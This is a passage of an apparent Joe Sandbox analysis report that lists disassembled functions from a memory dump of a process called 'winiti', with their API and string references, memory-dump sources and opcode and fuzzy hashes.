                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: _wcsnlen
                  • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                  • API String ID: 3628947076-1387797911
                  • Opcode ID: f067e27b1dc82437359fb0ae671f6da3ea0774abbb3a78f4b06307b0f815b6aa
                  • Instruction ID: 4b8a5538219a1860f8278971288c4abce525327bdaafd77f7d56552f31a0676f
                  • Opcode Fuzzy Hash: f067e27b1dc82437359fb0ae671f6da3ea0774abbb3a78f4b06307b0f815b6aa
                  • Instruction Fuzzy Hash: CA41C775349609BAEB01DAD2CD42FEFB76CAF44B85F100111BE04F5191DBB0DB498BA4
                  Function 009013CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 937953ed3182704c770eb6fef624c719519ecc7aca5451cb0d39e678ab9dd9df
                  • Instruction ID: 26dd280639aa35ff1518d688614d283b3e45a4d6647a5f07612772d2cd1dfbaf
                  • Opcode Fuzzy Hash: 937953ed3182704c770eb6fef624c719519ecc7aca5451cb0d39e678ab9dd9df
                  • Instruction Fuzzy Hash: 576137B5900655AECB24DF6DC8808BFBBB9FF94300B54C56EF5D687691D334AA80CB60
                  Function 00963B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: e014411330255e1b113d43c175c767ee0ed7b1b537dd10ee821f23b52bc34867
                  • Instruction ID: 01eb52d91fdde9579a550a7b4e54692aa0eb68c0c4f9e87fc45f535725a4b22a
                  • Opcode Fuzzy Hash: e014411330255e1b113d43c175c767ee0ed7b1b537dd10ee821f23b52bc34867
                  • Instruction Fuzzy Hash: D8619176900648ABCB20DFA9C8519BE7BF9EF94310B14C56AFCED97541E238EB409B50
                  Function 008F7EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                  Download Yara Rule
                  APIs
                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00913F12
                  Strings
                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 0091E345
                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00913F75
                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0091E2FB
                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00913EC4
                  • ExecuteOptions, xrefs: 00913F04
                  • Execute=1, xrefs: 00913F5E
                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00913F4A
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: BaseDataModuleQuery
                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                  • API String ID: 3901378454-484625025
                  • Opcode ID: 587eb052462a409617d44b0b7c4cea4380ff929dee154fb6fa9d0afda70bf443
                  • Instruction ID: d6785467c0747741815115a6e70cceee07e207a6ec2b549953a9dbe8ff2c79af
                  • Opcode Fuzzy Hash: 587eb052462a409617d44b0b7c4cea4380ff929dee154fb6fa9d0afda70bf443
                  • Instruction Fuzzy Hash: F2419971A4031C7AEF209AA4DCC6FEA73BCFF58700F0005A9B615E61C1EA70DA858B61
                  Function 00900B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: __fassign
                  • String ID: .$:$:
                  • API String ID: 3965848254-2308638275
                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                  • Instruction ID: 759d062b201271faa9d41a037277465b0e31306e5b9c2d292e436fb1f884d6e6
                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                  • Instruction Fuzzy Hash: 2EA19D71D0031AEFEF24CF64C8457BEB7B9AF95704F24856AD882A72C1D7349A41CB52
                  Function 00900554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                  Download Yara Rule
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00922206
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-4236105082
                  • Opcode ID: b6c632859a1867e37996ac3b7668455394c0d5c30519c82e0b46b11d31c6ac26
                  • Instruction ID: 2029c48b347973a1e417023e4c4ed5587bf3c9de51bb9eb2707bfd12ae49ea21
                  • Opcode Fuzzy Hash: b6c632859a1867e37996ac3b7668455394c0d5c30519c82e0b46b11d31c6ac26
                  • Instruction Fuzzy Hash: E25128357042216FEB14CB19DC81FA633ADEBD4720F218229FD55DB38ADA75EC828790
                  Function 009014C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                  Download Yara Rule
                  APIs
                  • ___swprintf_l.LIBCMT ref: 0092EA22
                    • Part of subcall function 009013CB: ___swprintf_l.LIBCMT ref: 0090146B
                    • Part of subcall function 009013CB: ___swprintf_l.LIBCMT ref: 00901490
                  • ___swprintf_l.LIBCMT ref: 0090156D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$]:%u
                  • API String ID: 48624451-3050659472
                  • Opcode ID: 0b947eaf65a40aa398fb11e08c1526dca05518a3026783b736d9afff915b56d1
                  • Instruction ID: d60bb4c4d903ac62cfddf306c8561288ee324dec9172430db109ee52469ae110
                  • Opcode Fuzzy Hash: 0b947eaf65a40aa398fb11e08c1526dca05518a3026783b736d9afff915b56d1
                  • Instruction Fuzzy Hash: 8D21BF729002299FCB21EE68DC45AEE73BCFB54700F444456F946E7280DB74EA988BE1
                  Function 00963DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$]:%u
                  • API String ID: 48624451-3050659472
                  • Opcode ID: 684bc900f9cfa58f1e3a95f72e88e1ad55824cddb046a8726b7cb665d9b76e40
                  • Instruction ID: 059a7f9520018a1c3c6fa65fc03c2c7a1cdb6c1a5d284e58829349d738681e79
                  • Opcode Fuzzy Hash: 684bc900f9cfa58f1e3a95f72e88e1ad55824cddb046a8726b7cb665d9b76e40
                  • Instruction Fuzzy Hash: 0921AFB290021AABCB21AF698C45AEF77ACEF54714F048525FC08D3241EB759F44C7E1
                  Function 008E53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                  Download Yara Rule
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009222F4
                  Strings
                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009222FC
                  • RTL: Re-Waiting, xrefs: 00922328
                  • RTL: Resource at %p, xrefs: 0092230B
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-871070163
                  • Opcode ID: 1027d14c637813b510018e9f0e149c0f38151fcf388f2d33e48c474d3080c1ae
                  • Instruction ID: 146231664f337d54ada5b514624ca4cd9e6bdcc1f33c7041862d277fd9fddd68
                  • Opcode Fuzzy Hash: 1027d14c637813b510018e9f0e149c0f38151fcf388f2d33e48c474d3080c1ae
                  • Instruction Fuzzy Hash: D9513771600715ABEB14DB29DC81FA673ACFF96764F104229FD14DB381EA71EC4287A0
                  Function 008EEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                  Download Yara Rule
                  Strings
                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0092248D
                  • RTL: Re-Waiting, xrefs: 009224FA
                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009224BD
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                  • API String ID: 0-3177188983
                  • Opcode ID: 02e70fa68b300a369afab4090a9c3230fea6a8287b51a5e18554026b5fc455ea
                  • Instruction ID: 7fed8ecd225f7c452b8550a1e146dc44be2ed6bb4e60e0a285cc7c9590204f12
                  • Opcode Fuzzy Hash: 02e70fa68b300a369afab4090a9c3230fea6a8287b51a5e18554026b5fc455ea
                  • Instruction Fuzzy Hash: 4F41D570600214BBDB20EFA9DC85FAA77B8FF85720F208619F565DB3D1D634E9418761
                  Function 008FFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: __fassign
                  • String ID:
                  • API String ID: 3965848254-0
                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                  • Instruction ID: 7839d0770ed58b7be5dc0245013052c5d3921c76c0faf561e5260a59cbb3be55
                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                  • Instruction Fuzzy Hash: 1D914931D0021EEBDF24DFA8C8456FEB7B4FF55314F24847AD651EA2A2E7305A818B91
                  Function 00975CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: $$0
                  • API String ID: 1302938615-389342756
                  • Opcode ID: 1407763334a16120dfe45bff2d65f069755870e5c5d3906492eafbf049ff66e8
                  • Instruction ID: b4af61a3e16e0a5ce74abc1b0a8241f57d4b26265c915f8af119a8b66fa8f2c3
                  • Opcode Fuzzy Hash: 1407763334a16120dfe45bff2d65f069755870e5c5d3906492eafbf049ff66e8
                  • Instruction Fuzzy Hash: B591C032D04A8AAFDF64CF98C4453EDBBB5BF41310F16855AD8A9A72D1C7B44A41CB40